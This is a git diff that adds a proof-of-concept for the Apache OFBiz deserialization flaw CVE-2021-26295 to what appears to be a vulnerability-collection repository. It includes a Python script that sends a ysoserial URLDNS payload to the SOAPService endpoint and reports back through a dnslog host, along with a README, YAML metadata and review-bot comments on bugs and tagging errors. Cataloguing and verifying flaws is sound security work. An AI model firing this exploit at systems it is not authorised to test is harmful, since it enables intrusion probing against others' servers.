diff --git a/cve/apache-OFBiz/2021/CVE-2021-26295/CVE-2021-26295.py b/cve/apache-OFBiz/2021/CVE-2021-26295/CVE-2021-26295.py
new file mode 100644
index 0000000000000000000000000000000000000000..077956e3e4d487d7e1aa665e9a843984668f85f9
--- /dev/null
+++ b/cve/apache-OFBiz/2021/CVE-2021-26295/CVE-2021-26295.py
@@ -0,0 +1,28 @@
+import requests
+import sys
+import subprocess
+import binascii
+from urllib3.exceptions import InsecureRequestWarning
+
+def transfor(content):
+ return binascii.hexlify(content)
+def main():
+ res = subprocess.Popen(['java','-jar', 'ysoserial.jar', "URLDNS", dnslog, '>data.ot'], shell=True)
+ res.wait()
+ with open('data.ot','rb') as f:
+ content = f.read()
+ hex_data = transfor(content)
+ headers = {'Content-Type': 'text/xml'}
+ post_data = '''%s''' % hex_data
+ requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
+ try:
+ res = requests.post('%s/webtools/control/SOAPService' % host , data = post_data , headers = headers , verify=False)
+ if res.status_code == 200 :
+ print("[+]Done! check your dnslog: " + dnslog)
+ except:
+ print("[!]Request error!")
+
+if __name__ == '__main__':
+ host = sys.argv[1]
+ dnslog = sys.argv[2]
+ main()
diff --git a/cve/apache-OFBiz/2021/CVE-2021-26295/README.md b/cve/apache-OFBiz/2021/CVE-2021-26295/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..005b35662e0449bc1dc8fb34b22858c233234318
--- /dev/null
+++ b/cve/apache-OFBiz/2021/CVE-2021-26295/README.md
@@ -0,0 +1,4 @@
+# CVE-2021-26295-Apache-OFBiz
+CVE-2021-26295 Apache OFBiz rmi反序列化POC
+
+需要将ysoserial.jar放置在目录下,且不能使用java的高版本
diff --git a/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml b/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..16b59c306cdbe0bbfa2771f8ff8443b4c6da3074
--- /dev/null
+++ b/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml
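Review bot: The first line of `main` passes a list argv together with `shell=True`, which is a subprocess misuse: only `'java'` is handed to the shell as the command string and the remaining list items become its positional parameters, so the jar arguments and the `>data.ot` redirect never reach `java`, and `res.wait()` discards the return code before `data.ot` is opened; the idiom is `shell=False` with the list, an explicit `stdout=` target, and a check of the return code. The bare `except:` at the end of the `try` hides every failure (including `KeyboardInterrupt`) behind a fixed message; narrow it to `except requests.RequestException as exc:` and print `exc`, and note that a `200` alone does not prove the request was processed. `host` and `dnslog` exist only as module globals set under `__main__`, so `main()` raises `NameError` when imported; make them parameters, `def main(host, dnslog):`, and pass `sys.argv[1]`/`sys.argv[2]` from the guard. A one-line module docstring stating that the script only writes the serialized payload to `data.ot` and posts it to `/webtools/control/SOAPService` would also help readers.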
@@ -0,0 +1,21 @@
+id: CVE-2021-26295
+source: https://download.csdn.net/download/weixin_42165508/16093364?utm_medium=distribute.pc_relevant_download.none-task-download-2~default~OPENSEARCH~Rate-16-16093364-download-85129482.dl_default&depth_1-utm_source=distribute.pc_relevant_download.none-task-download-2~default~OPENSEARCH~Rate-16-16093364-download-85129482.dl_default&dest=https%3A%2F%2Fdownload.csdn.net%2Fdownload%2Fweixin_42165508%2F16093364&spm=1003.2020.3001.6616.16
+info:
+ name: Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。
+ severity: critical
+ description:
+ CVE-2021-26295漏洞由RMI反序列化造成的远程代码执行漏洞,攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器。
+
+ scope-of-influence:
+ Apache OFBiz < 17.12.06
+ reference:
+ - https://blog.csdn.net/weixin_39811856/article/details/115238985
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-26295
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-26295
+ cwe-id: CWE-502
+ cnvd-id: None
+ kve-id: None
+ tags: cve2020, Apache, OFBiz
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 9bd0c3cc79ce071c9eb5e6ec281174759905e9fb..b580a93c798aa66de8f073dde6f4f91e4fcfac40 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -14,6 +14,8 @@ cve:
 apache-Dubbo:
 - CVE-2021-43297
 - CVE-2021-25641
+ apache-OFBiz:
+ - CVE-2021-26295
 apache-log4j:
 - CVE-2021-44228
 apache-solr:
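Review bot: `tags: cve2020, Apache, OFBiz` on the last line of the new file tags a 2021 CVE as `cve2020`, inconsistent with `id`, `cve-id` and the `2021/` directory; change it to `tags: cve2021, Apache, OFBiz`. The `name:` field holds a product description rather than a short vulnerability name, while the actual vulnerability summary sits under `description:`, so the two appear swapped in intent. The `source:` URL carries CSDN tracking parameters (`utm_medium`, `depth_1-utm_source`, `dest`, `spm`) that can be trimmed to the bare download path without losing the reference. `cnvd-id: None` and `kve-id: None` parse as the string `"None"`, not a YAML null; if the consumer treats these as absent identifiers, `~` or an empty value is presumably what is meant.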